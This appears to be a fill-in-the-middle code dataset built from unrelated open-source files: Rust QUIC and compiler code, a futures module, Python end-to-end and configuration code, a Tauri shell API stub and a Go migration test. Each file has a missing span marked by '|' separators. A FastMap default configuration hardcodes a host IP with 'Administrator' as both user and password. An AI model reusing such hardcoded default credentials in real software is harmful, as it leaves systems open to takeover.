0x4a, 0xdd, 0x2c, 0x96, 0x1b, 0x3f, 0x52, 0x87, 0xa6, 0xd1, 0x46, 0x7e, 0xe0,
0xae, 0xab, 0x33, 0x72, 0x4d, 0xbf,
],
),
server: hkdf::Prk::new_less_safe(
hkdf::HKDF_SHA256,
&[
0x42, 0xdc, 0x97, 0x21, 0x40, 0xe0, 0xf2, 0xe3, 0x98, 0x45, 0xb7, 0x67, 0x61,
0x34, 0x39, 0xdc, 0x67, 0x58, 0xca, 0x43, 0x25, 0x9b, 0x87, 0x85, 0x06, 0x82,
0x4e, 0xb1, 0xe4, 0x38, 0xd8, 0x55,
],
),
};
let updated = next_1rtt_secrets(hkdf::HKDF_SHA256, &initial);
assert!(equal_prk(
&updated.client,
&hkdf::Prk::new_less_safe(
hkdf::HKDF_SHA256,
&[
0x42, 0xca, 0xc8, 0xc9, 0x1c, 0xd5, 0xeb, 0x40, 0x68, 0x2e, 0x43, 0x2e, 0xdf,
0x2d, 0x2b, 0xe9, 0xf4, 0x1a, 0x52, 0xca, 0x6b, 0x22, 0xd8, 0xe6, 0xcd, 0xb1,
0xe8, 0xac, 0xa9, 0x6, 0x1f, 0xce
]
)
));
assert!(equal_prk(
&updated.server,
&hkdf::Prk::new_less_safe(
hkdf::HKDF_SHA256,
&[
0xeb, 0x7f, 0x5e, 0x2a, 0x12, 0x3f, 0x40, 0x7d, 0xb4, 0x99, 0xe3, 0x61, 0xca,
0xe5, 0x90, 0xd4, 0xd9, 0x92, 0xe1, 0x4b, 0x7a, 0xce, 0x3, 0xc2, 0x44, 0xe0,
0x42, 0x21, 0x15, 0xb6, 0xd3, 0x8a
]
)
));
}
}
| get_0rtt_keys |
mod.rs | //! Futures
//!
//! This module contains a number of functions for working with `Future`s,
//! including the [`FutureExt`] trait and the [`TryFutureExt`] trait which add
//! methods to `Future` types.
#[cfg(feature = "alloc")]
pub use futures_core::future::{BoxFuture, LocalBoxFuture};
pub use futures_core::future::{FusedFuture, Future, TryFuture};
pub use futures_task::{FutureObj, LocalFutureObj, UnsafeFutureObj};
// Extension traits and combinators
#[allow(clippy::module_inception)]
mod future;
pub use self::future::{
Flatten, Fuse, FutureExt, Inspect, IntoStream, Map, NeverError, Then, UnitError, MapInto,
};
#[deprecated(note = "This is now an alias for [Flatten](Flatten)")]
pub use self::future::FlattenStream;
#[cfg(feature = "std")]
pub use self::future::CatchUnwind;
#[cfg(feature = "channel")]
#[cfg(feature = "std")]
pub use self::future::{Remote, RemoteHandle};
#[cfg(feature = "std")]
pub use self::future::Shared;
mod try_future;
pub use self::try_future::{
AndThen, ErrInto, OkInto, InspectErr, InspectOk, IntoFuture, MapErr, MapOk, OrElse, TryFlattenStream,
TryFutureExt, UnwrapOrElse, MapOkOrElse, TryFlatten,
};
#[cfg(feature = "sink")]
pub use self::try_future::FlattenSink;
// Primitive futures
mod lazy;
pub use self::lazy::{lazy, Lazy};
mod pending;
pub use self::pending::{pending, Pending};
mod maybe_done;
pub use self::maybe_done::{maybe_done, MaybeDone};
mod try_maybe_done;
pub use self::try_maybe_done::{try_maybe_done, TryMaybeDone};
mod option;
pub use self::option::OptionFuture;
mod poll_fn;
pub use self::poll_fn::{poll_fn, PollFn};
mod ready;
pub use self::ready::{err, ok, ready, Ready};
mod join;
pub use self::join::{join, join3, join4, join5, Join, Join3, Join4, Join5};
#[cfg(feature = "alloc")]
mod join_all;
#[cfg(feature = "alloc")]
pub use self::join_all::{join_all, JoinAll};
mod select;
pub use self::select::{select, Select};
#[cfg(feature = "alloc")]
mod select_all;
#[cfg(feature = "alloc")]
pub use self::select_all::{select_all, SelectAll};
mod try_join;
pub use self::try_join::{
try_join, try_join3, try_join4, try_join5, TryJoin, TryJoin3, TryJoin4, TryJoin5,
};
#[cfg(feature = "alloc")]
mod try_join_all;
#[cfg(feature = "alloc")]
pub use self::try_join_all::{try_join_all, TryJoinAll};
mod try_select;
pub use self::try_select::{try_select, TrySelect};
#[cfg(feature = "alloc")]
mod select_ok;
#[cfg(feature = "alloc")]
pub use self::select_ok::{select_ok, SelectOk};
mod either;
pub use self::either::Either;
cfg_target_has_atomic! {
#[cfg(feature = "alloc")]
mod abortable;
#[cfg(feature = "alloc")]
pub use self::abortable::{abortable, Abortable, AbortHandle, AbortRegistration, Aborted};
}
// Just a helper function to ensure the futures we're returning all have the
// right implementations.
fn | <T, F>(future: F) -> F
where
F: Future<Output = T>,
{
future
}
| assert_future |
issue-6804.rs | // Copyright 2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Matching against NaN should result in a warning
#![feature(slice_patterns)]
#![allow(unused)]
use std::f64::NAN;
fn main() | {
let x = NAN;
match x {
NAN => {}, //~ ERROR floating point constants cannot be used
//~| WARNING hard error
_ => {},
};
match [x, 1.0] {
[NAN, _] => {}, //~ ERROR floating point constants cannot be used
//~| WARNING hard error
_ => {},
};
} |
|
test_e2e.py | """
An end-to-end test which performs the following:
1. creates a ChRIS user account.
2. caw login
3. caw search
4. caw upload --pipeline ...
5. caw download
6. caw logout
"""
import os
import unittest
import random
import string
import requests
import subprocess as sp
from tempfile import NamedTemporaryFile, TemporaryDirectory
from time import sleep
from glob import iglob
def random_string(length=12) -> str:
return ''.join(random.choice(string.ascii_letters) for x in range(length))
address = 'http://localhost:8000/api/v1/'
username = 'caw_test_' + random_string(6)
password = random_string(12)
def create_account():
res = requests.post(
f'{address}users/',
headers={
'Content-Type': 'application/vnd.collection+json',
'Accept': 'application/json'
},
json={
'template': {
'data': [
{
'name': 'email',
'value': f'{username}@babyMRI.org'
},
{
'name': 'username',
'value': username
},
{
'name': 'password',
'value': password
}
]
}
}
)
res.raise_for_status()
data = res.json()
assert 'username' in data
assert data['username'] == username
def poll_feed(feed_url: str, jobs_count: int, poll_interval=10, timeout=300) -> dict:
timer = 0
headers = {
'Accept': 'application/json'
}
data = {}
while timer <= timeout:
print(f'calling get with {feed_url}')
import logging
logging.getLogger().setLevel(logging.DEBUG)
res = requests.get(feed_url, headers=headers, auth=(username, password))
res.raise_for_status()
data = res.json()
if data['finished_jobs'] == jobs_count:
return data
sleep(poll_interval)
timer += poll_interval
return data
class TestEndToEnd(unittest.TestCase):
@unittest.skipUnless('CAW_TEST_FULL' in os.environ, 'Set CAW_TEST_FULL=y to run the end-to-end test.')
def test_endtoend(self):
|
if __name__ == '__main__':
unittest.main()
| create_account()
sp.run(['caw', '--address', address, '--username', username, 'login', '--password-stdin'],
input=(password + '\n'), text=True, check=True)
with NamedTemporaryFile('w', suffix='.txt', delete=False) as f:
f.write("If you steal from one author it's plagiarism; if you steal from"
"\nmany it's research."
'\n -- Wilson Mizner\n')
search = sp.check_output(['caw', 'search'], text=True)
self.assertIn('Example branching pipeline', search,
msg='"Example branching pipeline" not found in `caw search`')
feed_url = sp.check_output(['caw', 'upload', '--pipeline', 'Example branching pipeline', '--', f.name],
text=True).rstrip('\n')
self.assertTrue(feed_url.startswith(address),
msg='Feed URL was not correctly printed after `caw upload`')
self.assertTrue(feed_url.endswith('/'),
msg='Feed URL was not correctly printed after `caw upload`')
feed_data = poll_feed(feed_url, jobs_count=9)
with TemporaryDirectory() as tmpdir:
sp.run(['caw', 'download', feed_data['files'], tmpdir])
# the pipeline runs pl-dircopy --prefix L where L is a letter.
# if the DAG is constructed properly, it should produce the following prefixes
prefixes = {'', 'a', 'ba', 'ca', 'dba', 'eca', 'fca', 'gca', 'hgca'}
suffix = os.path.basename(f.name)
results = [
# example:
# '/tmp/folder/caw_test_SzvEhj/feed_10/pl-dircopy_81/pl-simpledsapp_82/pl-simpledsapp_83/pl-simpledsapp_85/data/fcatmpl_hy4m5o.txt'
# --> 'fca'
os.path.basename(fname[:-len(suffix)])
for fname in iglob(os.path.join(tmpdir, '**', '*' + suffix), recursive=True)
]
self.assertEqual(len(results), 9, msg='Incorrect number of files produced by feed.')
self.assertSetEqual(prefixes, set(results),
msg='DAG not reconstructed in the correct order.')
sp.run(['caw', 'logout']) |
shell.rs | use crate::app::InvokeResponse;
use serde::Deserialize;
/// The API descriptor.
#[derive(Deserialize)]
#[serde(tag = "cmd", rename_all = "camelCase")]
pub enum Cmd {
/// The execute script API.
Execute { command: String, args: Vec<String> },
/// The open URL in browser API
Open { uri: String },
}
impl Cmd {
pub async fn run(self) -> crate::Result<InvokeResponse> {
match self {
Self::Execute {
command: _,
args: _,
} => {
#[cfg(execute)]
{
//TODO
Ok(().into())
}
#[cfg(not(execute))]
Err(crate::Error::ApiNotAllowlisted("execute".to_string()))
}
Self::Open { uri } => {
#[cfg(open)]
{
open_browser(uri);
Ok(().into())
}
#[cfg(not(open))]
Err(crate::Error::ApiNotAllowlisted("open".to_string()))
}
}
}
}
#[cfg(open)]
pub fn | (uri: String) {
#[cfg(test)]
assert!(uri.contains("http://"));
#[cfg(not(test))]
webbrowser::open(&uri).expect("Failed to open webbrowser with uri");
}
#[cfg(test)]
mod test {
use proptest::prelude::*;
// Test the open func to see if proper uris can be opened by the browser.
proptest! {
#[cfg(open)]
#[test]
fn check_open(uri in r"(http://)([\\w\\d\\.]+([\\w]{2,6})?)") {
super::open_browser(uri);
}
}
}
| open_browser |
lang_items.rs | // Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Detecting language items.
//
// Language items are items that represent concepts intrinsic to the language
// itself. Examples are:
//
// * Traits that specify "kinds"; e.g. "Sync", "Send".
//
// * Traits that represent operators; e.g. "Add", "Sub", "Index".
//
// * Functions called by the compiler itself.
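//
// For illustration only (this snippet is not part of this file), a library
// marks an item as a lang item with an attribute such as:
//
//     #[lang = "sized"]
//     pub trait Sized {}
//
// The collector below reads these `#[lang = "..."]` attributes and records the
// tagged items in the LanguageItems table.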
pub use self::LangItem::*;
use session::Session;
use metadata::csearch::each_lang_item;
use middle::ty;
use middle::weak_lang_items;
use util::nodemap::FnvHashMap;
use syntax::ast;
use syntax::ast_util::local_def;
use syntax::attr::AttrMetaMethods;
use syntax::codemap::{DUMMY_SP, Span};
use syntax::parse::token::InternedString;
use syntax::visit::Visitor;
use syntax::visit;
use std::iter::Enumerate;
use std::slice;
// The actual lang items defined come at the end of this file in one handy table.
// So you probably just want to nip down to the end.
macro_rules! lets_do_this {
(
$( $variant:ident, $name:expr, $method:ident; )*
) => {
enum_from_u32! {
#[derive(Copy, Clone, PartialEq, Eq, Hash)]
pub enum LangItem {
$($variant,)*
}
}
pub struct LanguageItems {
pub items: Vec<Option<ast::DefId>>,
pub missing: Vec<LangItem>,
}
impl LanguageItems {
pub fn new() -> LanguageItems {
fn foo(_: LangItem) -> Option<ast::DefId> { None }
LanguageItems {
items: vec!($(foo($variant)),*),
missing: Vec::new(),
}
}
pub fn items<'a>(&'a self) -> Enumerate<slice::Iter<'a, Option<ast::DefId>>> {
self.items.iter().enumerate()
}
pub fn item_name(index: usize) -> &'static str {
let item: Option<LangItem> = LangItem::from_u32(index as u32);
match item {
$( Some($variant) => $name, )*
None => "???"
}
}
pub fn require(&self, it: LangItem) -> Result<ast::DefId, String> {
match self.items[it as usize] {
Some(id) => Ok(id),
None => {
Err(format!("requires `{}` lang_item",
LanguageItems::item_name(it as usize)))
}
}
}
pub fn require_owned_box(&self) -> Result<ast::DefId, String> {
self.require(OwnedBoxLangItem)
}
pub fn from_builtin_kind(&self, bound: ty::BuiltinBound)
-> Result<ast::DefId, String>
{
match bound {
ty::BoundSend => self.require(SendTraitLangItem),
ty::BoundSized => self.require(SizedTraitLangItem),
ty::BoundCopy => self.require(CopyTraitLangItem),
ty::BoundSync => self.require(SyncTraitLangItem),
}
}
pub fn to_builtin_kind(&self, id: ast::DefId) -> Option<ty::BuiltinBound> {
if Some(id) == self.send_trait() {
Some(ty::BoundSend)
} else if Some(id) == self.sized_trait() {
Some(ty::BoundSized)
} else if Some(id) == self.copy_trait() {
Some(ty::BoundCopy)
} else if Some(id) == self.sync_trait() {
Some(ty::BoundSync)
} else {
None
}
}
pub fn fn_trait_kind(&self, id: ast::DefId) -> Option<ty::ClosureKind> {
let def_id_kinds = [
(self.fn_trait(), ty::FnClosureKind),
(self.fn_mut_trait(), ty::FnMutClosureKind),
(self.fn_once_trait(), ty::FnOnceClosureKind),
];
for &(opt_def_id, kind) in &def_id_kinds {
if Some(id) == opt_def_id {
return Some(kind);
}
}
None
}
$(
#[allow(dead_code)]
pub fn $method(&self) -> Option<ast::DefId> {
self.items[$variant as usize]
}
)*
}
struct LanguageItemCollector<'a> {
items: LanguageItems,
session: &'a Session,
item_refs: FnvHashMap<&'static str, usize>,
}
impl<'a, 'v> Visitor<'v> for LanguageItemCollector<'a> {
fn visit_item(&mut self, item: &ast::Item) {
if let Some(value) = extract(&item.attrs) {
let item_index = self.item_refs.get(&value[..]).cloned();
if let Some(item_index) = item_index {
self.collect_item(item_index, local_def(item.id), item.span)
}
}
visit::walk_item(self, item);
}
}
impl<'a> LanguageItemCollector<'a> {
pub fn new(session: &'a Session) -> LanguageItemCollector<'a> {
let mut item_refs = FnvHashMap();
$( item_refs.insert($name, $variant as usize); )*
LanguageItemCollector {
session: session,
items: LanguageItems::new(),
item_refs: item_refs
}
}
pub fn collect_item(&mut self, item_index: usize,
item_def_id: ast::DefId, span: Span) {
// Check for duplicates.
match self.items.items[item_index] {
Some(original_def_id) if original_def_id != item_def_id => {
span_err!(self.session, span, E0152,
"duplicate entry for `{}`", LanguageItems::item_name(item_index));
}
Some(_) | None => {
// OK.
}
}
// Matched.
self.items.items[item_index] = Some(item_def_id);
}
pub fn collect_local_language_items(&mut self, krate: &ast::Crate) {
visit::walk_crate(self, krate);
}
pub fn collect_external_language_items(&mut self) {
let crate_store = &self.session.cstore;
crate_store.iter_crate_data(|crate_number, _crate_metadata| {
each_lang_item(crate_store, crate_number, |node_id, item_index| {
let def_id = ast::DefId { krate: crate_number, node: node_id };
self.collect_item(item_index, def_id, DUMMY_SP);
true
});
})
}
pub fn collect(&mut self, krate: &ast::Crate) {
self.collect_local_language_items(krate);
self.collect_external_language_items();
}
}
pub fn extract(attrs: &[ast::Attribute]) -> Option<InternedString> {
for attribute in attrs {
match attribute.value_str() {
Some(ref value) if attribute.check_name("lang") => {
return Some(value.clone());
}
_ => {}
}
}
return None;
}
pub fn collect_language_items(krate: &ast::Crate,
session: &Session) -> LanguageItems {
let mut collector = LanguageItemCollector::new(session);
collector.collect(krate);
let LanguageItemCollector { mut items, .. } = collector;
weak_lang_items::check_crate(krate, session, &mut items);
session.abort_if_errors();
items
}
// End of the macro
}
}
lets_do_this! { | // Variant name, Name, Method name;
CharImplItem, "char", char_impl;
StrImplItem, "str", str_impl;
SliceImplItem, "slice", slice_impl;
ConstPtrImplItem, "const_ptr", const_ptr_impl;
MutPtrImplItem, "mut_ptr", mut_ptr_impl;
I8ImplItem, "i8", i8_impl;
I16ImplItem, "i16", i16_impl;
I32ImplItem, "i32", i32_impl;
I64ImplItem, "i64", i64_impl;
IsizeImplItem, "isize", isize_impl;
U8ImplItem, "u8", u8_impl;
U16ImplItem, "u16", u16_impl;
U32ImplItem, "u32", u32_impl;
U64ImplItem, "u64", u64_impl;
UsizeImplItem, "usize", usize_impl;
F32ImplItem, "f32", f32_impl;
F64ImplItem, "f64", f64_impl;
SendTraitLangItem, "send", send_trait;
SizedTraitLangItem, "sized", sized_trait;
UnsizeTraitLangItem, "unsize", unsize_trait;
CopyTraitLangItem, "copy", copy_trait;
SyncTraitLangItem, "sync", sync_trait;
DropTraitLangItem, "drop", drop_trait;
CoerceUnsizedTraitLangItem, "coerce_unsized", coerce_unsized_trait;
AddTraitLangItem, "add", add_trait;
SubTraitLangItem, "sub", sub_trait;
MulTraitLangItem, "mul", mul_trait;
DivTraitLangItem, "div", div_trait;
RemTraitLangItem, "rem", rem_trait;
NegTraitLangItem, "neg", neg_trait;
NotTraitLangItem, "not", not_trait;
BitXorTraitLangItem, "bitxor", bitxor_trait;
BitAndTraitLangItem, "bitand", bitand_trait;
BitOrTraitLangItem, "bitor", bitor_trait;
ShlTraitLangItem, "shl", shl_trait;
ShrTraitLangItem, "shr", shr_trait;
IndexTraitLangItem, "index", index_trait;
IndexMutTraitLangItem, "index_mut", index_mut_trait;
RangeStructLangItem, "range", range_struct;
RangeFromStructLangItem, "range_from", range_from_struct;
RangeToStructLangItem, "range_to", range_to_struct;
RangeFullStructLangItem, "range_full", range_full_struct;
UnsafeCellTypeLangItem, "unsafe_cell", unsafe_cell_type;
DerefTraitLangItem, "deref", deref_trait;
DerefMutTraitLangItem, "deref_mut", deref_mut_trait;
FnTraitLangItem, "fn", fn_trait;
FnMutTraitLangItem, "fn_mut", fn_mut_trait;
FnOnceTraitLangItem, "fn_once", fn_once_trait;
EqTraitLangItem, "eq", eq_trait;
OrdTraitLangItem, "ord", ord_trait;
StrEqFnLangItem, "str_eq", str_eq_fn;
// A number of panic-related lang items. The `panic` item corresponds to
// divide-by-zero and various panic cases with `match`. The
// `panic_bounds_check` item is for indexing arrays.
//
// The `begin_unwind` lang item has a predefined symbol name and is sort of
// a "weak lang item" in the sense that a crate is not required to have it
// defined to use it, but a final product is required to define it
// somewhere. Additionally, there are restrictions on crates that use a weak
// lang item, but do not have it defined.
PanicFnLangItem, "panic", panic_fn;
PanicBoundsCheckFnLangItem, "panic_bounds_check", panic_bounds_check_fn;
PanicFmtLangItem, "panic_fmt", panic_fmt;
ExchangeMallocFnLangItem, "exchange_malloc", exchange_malloc_fn;
ExchangeFreeFnLangItem, "exchange_free", exchange_free_fn;
StrDupUniqFnLangItem, "strdup_uniq", strdup_uniq_fn;
StartFnLangItem, "start", start_fn;
EhPersonalityLangItem, "eh_personality", eh_personality;
EhPersonalityCatchLangItem, "eh_personality_catch", eh_personality_catch;
MSVCTryFilterLangItem, "msvc_try_filter", msvc_try_filter;
ExchangeHeapLangItem, "exchange_heap", exchange_heap;
OwnedBoxLangItem, "owned_box", owned_box;
PhantomDataItem, "phantom_data", phantom_data;
// Deprecated:
CovariantTypeItem, "covariant_type", covariant_type;
ContravariantTypeItem, "contravariant_type", contravariant_type;
InvariantTypeItem, "invariant_type", invariant_type;
CovariantLifetimeItem, "covariant_lifetime", covariant_lifetime;
ContravariantLifetimeItem, "contravariant_lifetime", contravariant_lifetime;
InvariantLifetimeItem, "invariant_lifetime", invariant_lifetime;
NoCopyItem, "no_copy_bound", no_copy_bound;
NonZeroItem, "non_zero", non_zero;
StackExhaustedLangItem, "stack_exhausted", stack_exhausted;
DebugTraitLangItem, "debug_trait", debug_trait;
} | |
configfile.py | #!/usr/bin/python
import os
import sys
import time
import six
if sys.version[0] == '2':
from ConfigParser import ConfigParser
from cStringIO import StringIO
elif sys.version[0] == '3':
from configparser import ConfigParser
from io import StringIO
from larch.utils import OrderedDict
conf_sects = {'general': {},
'xps':{'bools':('use_ftp',)},
'fast_positioners': {'ordered':True},
'slow_positioners': {'ordered':True},
'xrf': {},
'scan': {'ints': ('dimension',),
'floats':('start1','stop1', 'step1','time1',
'start2','stop2', 'step2')}}
__c = (('general', ('mapdb', 'struck', 'scaler', 'xmap', 'mono',
'fileplugin', 'basedir', 'scandir', 'envfile')),
('xps', ('host', 'user', 'passwd', 'group', 'positioners')),
('scan', ('filename', 'dimension', 'comments', 'pos1', 'start1', 'stop1',
'step1', 'time1', 'pos2', 'start2', 'stop2', 'step2')),
('xrf', ('use', 'type', 'prefix', 'plugin')),
('fast_positioners', None),
('slow_positioners', None))
conf_objs = OrderedDict(__c)
conf_files = ('MapDefault.ini',
'//cars5/Data/xas_user/config/FastMap/Default.ini')
##struck = 13IDC:str:
##scaler = 13IDC:scaler2
default_conf = """# FastMap configuration file (default)
[general]
mapdb = 13XRM:map:
mono = 13IDA:
struck = 13IDE:SIS1
scaler = 13IDE:scaler1
xmap = dxpMercury:
fileplugin = netCDF1:
basedir = //cars5/Data/xas_user/June2011/_Setup
scandir = Scan00001
envfile = //cars5/Data/xas_user/config/XRM_XMAP_PVS_IDE.DAT
[xps]
type = NewportXPS
mode = XYGroup
host = 164.54.160.180
user = Administrator
passwd = Administrator
group = FINE
positioners= X, Y
[scan]
filename = scan.001
dimension = 2
pos1 = 13XRM:m1
start1 = -1.0
stop1 = 1.0
step1 = 0.01
time1 = 20.0
pos2 = 13XRM:m2
start2 = -1.0
stop2 = 1.0
step2 = 0.01
[fast_positioners]
1 = 13XRM:m1 | X
2 = 13XRM:m2 | Y
[slow_positioners]
1 = 13XRM:m1 | X
2 = 13XRM:m2 | Y
3 = 13XRM:m3 | Theta
4 = 13XRM:pm1 | Stage Z (focus)
5 = 13XRM:pm2 | Stage X
6 = 13XRM:m6 | Stage Y (vert)
"""
class FastMapConfig(object):
def __init__(self,filename=None,conftext=None):
self.config = {}
self.cp = ConfigParser()
conf_found = False
if filename is not None:
self.Read(fname=filename)
else:
for fname in conf_files:
if os.path.exists(fname) and os.path.isfile(fname):
self.Read(fname)
conf_found = True
break
if not conf_found:
self.cp.readfp(StringIO(default_conf))
self._process_data()
def Read(self,fname=None):
if fname is not None:
ret = self.cp.read(fname)
if len(ret)==0:
time.sleep(0.5)
ret = self.cp.read(fname)
self.filename = fname
self._process_data()
def _process_data(self):
for sect,opts in conf_sects.items():
# if sect == 'scan': print( opts)
if not self.cp.has_section(sect):
continue
bools = opts.get('bools',[])
floats= opts.get('floats',[])
ints = opts.get('ints',[])
thissect = {}
is_ordered = False
if 'ordered' in opts:
|
for opt in self.cp.options(sect):
get = self.cp.get
if opt in bools: get = self.cp.getboolean
elif opt in floats: get = self.cp.getfloat
elif opt in ints: get = self.cp.getint
val = get(sect,opt)
if is_ordered and '|' in val:
opt,val = val.split('|',1)
opt = opt.strip()
val = val.strip()
thissect[opt] = val
self.config[sect] = thissect
def Save(self,fname):
o = []
cnf = self.config
self.filename = fname
o.append('# FastMap configuration file (saved: %s)' % (time.ctime()))
for sect,optlist in conf_objs.items():
o.append('#------------------#\n[%s]'%sect)
if optlist is not None:
for opt in optlist:
try:
val = cnf[sect].get(opt,'<unknown>')
if not isinstance(val, six.string_types):
val = str(val)
o.append("%s = %s" % (opt,val))
except:
pass
else:
for i,x in enumerate(cnf[sect]):
o.append("%i = %s | %s" % (i+1,x,
cnf[sect].get(x,'<unknown>')))
o.append('#------------------#\n')
f = open(fname,'w')
f.write('\n'.join(o))
f.close()
def SaveScanParams(self,fname):
"save only scan parameters to a file"
o = []
o.append('# FastMap Scan Parameter file (saved: %s)' % (time.ctime()))
sect = 'scan'
optlist = conf_objs[sect]
o.append('#------------------#\n[%s]'%sect)
scan =self.config['scan']
for opt in optlist:
val = scan.get(opt,None)
if val is not None:
if not isinstance(val, six.string_types):
val = str(val)
o.append("%s = %s" % (opt,val))
o.append('#------------------#\n')
f = open(fname,'w')
f.write('\n'.join(o))
f.close()
def sections(self):
return self.config.keys()
def section(self, section):
return self.config[section]
def get(self, section, value=None):
if value is None:
return self.config[section]
else:
return self.config[section][value]
if __name__ == "__main__":
a = FastMapConfig()
a.Read('default.ini')
for k,v in a.config.items():
print( k,v, type(v))
a.Read('xmap.001.ini')
print( a.config['scan'])
a.SaveScanParams('xmap.002.ini')
| thissect = OrderedDict()
is_ordered = True |
kv_migrate_test.go | package actions_test
import (
"bytes"
"context"
"math/rand"
"os"
"strconv"
"testing"
"time"
"github.com/golang/mock/gomock"
"github.com/hashicorp/go-multierror"
"github.com/stretchr/testify/require"
"github.com/treeverse/lakefs/pkg/actions"
"github.com/treeverse/lakefs/pkg/actions/mock"
"github.com/treeverse/lakefs/pkg/db"
"github.com/treeverse/lakefs/pkg/kv"
"github.com/treeverse/lakefs/pkg/kv/kvtest"
"github.com/treeverse/lakefs/pkg/kv/postgres"
"github.com/treeverse/lakefs/pkg/testutil"
)
const (
migrateBenchRepo = "migrateBenchRepo"
migrateTestRepo = "migrateTestRepo"
actionsSampleSize = 10
)
func BenchmarkMigrate(b *testing.B) {
b.Run("Benchmark-250", func(b *testing.B) {
benchmarkMigrate(250, b)
})
b.Run("Benchmark-2500", func(b *testing.B) {
benchmarkMigrate(2500, b)
})
b.Run("Benchmark-25000", func(b *testing.B) {
benchmarkMigrate(25000, b)
})
}
// benchmarkMigrate - use this test to benchmark the migration time of actions. The default dataset size is kept small so as to not slow down regular test runs.
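// An invocation along these lines runs only the benchmarks (the package path is illustrative, not taken from this file):
//
//	go test -bench BenchmarkMigrate -run '^$' ./pkg/actions/...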
func benchmarkMigrate(runCount int, b *testing.B) {
ctx := context.Background()
database, _ := testutil.GetDB(b, databaseURI)
createMigrateTestData(b, ctx, database, migrateBenchRepo, runCount)
kvStore := kvtest.MakeStoreByName(postgres.DriverName, databaseURI)(b, ctx)
buf, _ := os.CreateTemp("", "migrate")
defer os.Remove(buf.Name())
defer buf.Close()
b.ResetTimer()
for n := 0; n < b.N; n++ {
err := actions.Migrate(ctx, database.Pool(), buf)
require.NoError(b, err)
_, _ = buf.Seek(0, 0)
testutil.MustDo(b, "Import file", kv.Import(ctx, buf, kvStore))
}
}
func TestMigrate(t *testing.T) {
var testData = make([][]actions.RunManifest, actionsSampleSize)
ctx := context.Background()
database, _ := testutil.GetDB(t, databaseURI)
ctrl := gomock.NewController(t)
testSource := mock.NewMockSource(ctrl)
testWriter := mock.NewMockOutputWriter(ctrl)
mockStatsCollector := NewActionStatsMockCollector()
for i := 0; i < actionsSampleSize; i++ {
testData[i] = createMigrateTestData(t, ctx, database, migrateTestRepo+strconv.Itoa(i), actionsSampleSize)
}
buf := bytes.Buffer{}
err := actions.Migrate(ctx, database.Pool(), &buf)
require.NoError(t, err)
kvStore := kvtest.MakeStoreByName(postgres.DriverName, databaseURI)(t, ctx)
mStore := kv.StoreMessage{Store: kvStore}
testutil.MustDo(t, "Import file", kv.Import(ctx, &buf, kvStore))
kvService := actions.NewService(ctx, actions.NewActionsKVStore(mStore), testSource, testWriter, &actions.DecreasingIDGenerator{}, &mockStatsCollector, true)
for i := 0; i < actionsSampleSize; i++ {
validateTestData(t, ctx, kvService, mStore, testData[i], migrateTestRepo+strconv.Itoa(i))
}
}
func validateTestData(t *testing.T, ctx context.Context, service actions.Service, store kv.StoreMessage, testData []actions.RunManifest, repoID string) {
runs, err := service.ListRunResults(ctx, repoID, "", "", "")
require.NoError(t, err)
defer runs.Close()
runCount := 0
for runs.Next() {
runCount++
run := runs.Value()
runIdx, err := strconv.Atoi(run.SourceRef)
// Check for secondary keys
if run.BranchID != "" {
secondary := kv.SecondaryIndex{}
rk := actions.RunByBranchPath(repoID, run.BranchID, run.RunID)
_, err = store.GetMsg(ctx, actions.PartitionKey, rk, &secondary)
require.NoError(t, err)
r := actions.RunResultData{}
_, err = store.GetMsg(ctx, actions.PartitionKey, string(secondary.PrimaryKey), &r)
require.NoError(t, err)
require.Equal(t, run, actions.RunResultFromProto(&r))
}
if run.CommitID != "" {
secondary := kv.SecondaryIndex{}
rk := actions.RunByCommitPath(repoID, run.CommitID, run.RunID)
_, err = store.GetMsg(ctx, actions.PartitionKey, rk, &secondary)
require.NoError(t, err)
r := actions.RunResultData{}
_, err = store.GetMsg(ctx, actions.PartitionKey, string(secondary.PrimaryKey), &r)
require.Equal(t, run, actions.RunResultFromProto(&r))
}
// Validate tasks
tasks, err := service.ListRunTaskResults(ctx, repoID, run.RunID, "")
require.NoError(t, err)
taskCount := 0
for i := 0; tasks.Next(); i++ {
taskCount++
task := tasks.Value()
taskIdx, err := strconv.Atoi(task.HookID)
require.NoError(t, err)
task.RunID = testData[runIdx].HooksRun[i].RunID
require.Equal(t, testData[runIdx].HooksRun[taskIdx], *task)
}
tasks.Close()
require.Equal(t, len(testData[runIdx].HooksRun), taskCount)
// Validate run data
run.RunID = testData[runIdx].Run.RunID
require.NoError(t, err)
expRun := testData[runIdx]
require.Equal(t, expRun.Run, *run)
}
require.Equal(t, len(testData), runCount)
}
func | (t testing.TB, ctx context.Context, database db.Database, repoID string, size int) []actions.RunManifest {
t.Helper()
rand.Seed(time.Now().UnixNano())
runs := make([]actions.RunManifest, 0)
runChan := make(chan *actions.RunManifest, 100)
var g multierror.Group
for i := 0; i < 10; i++ {
g.Go(func() error {
return writeToDB(ctx, runChan, repoID, database)
})
}
for i := 0; i < size; i++ {
iStr := strconv.Itoa(i)
now := time.Now().UTC().Truncate(time.Second)
runID := (&actions.IncreasingIDGenerator{}).NewRunID()
run := actions.RunManifest{
Run: actions.RunResult{
RunID: runID,
BranchID: "SomeBranch" + iStr,
SourceRef: iStr, // use this to identify old runID in KV format
EventType: "EventType" + iStr,
CommitID: "CommitID" + iStr,
StartTime: now,
EndTime: now.Add(1 * time.Hour).UTC().Truncate(time.Second),
Passed: rand.Intn(2) == 1,
},
HooksRun: make([]actions.TaskResult, 0),
}
for j := 0; j < 10; j++ {
jStr := strconv.Itoa(j)
now = time.Now().UTC().Truncate(time.Second)
h := actions.TaskResult{
RunID: run.Run.RunID,
HookRunID: actions.NewHookRunID(i, j),
HookID: jStr, // used to identify task when iterating over task results
ActionName: "Some_Action_" + jStr,
StartTime: now,
EndTime: now.Add(5 * time.Minute).UTC().Truncate(time.Second),
Passed: rand.Intn(2) == 1,
}
run.HooksRun = append(run.HooksRun, h)
}
runs = append(runs, run)
runChan <- &run
}
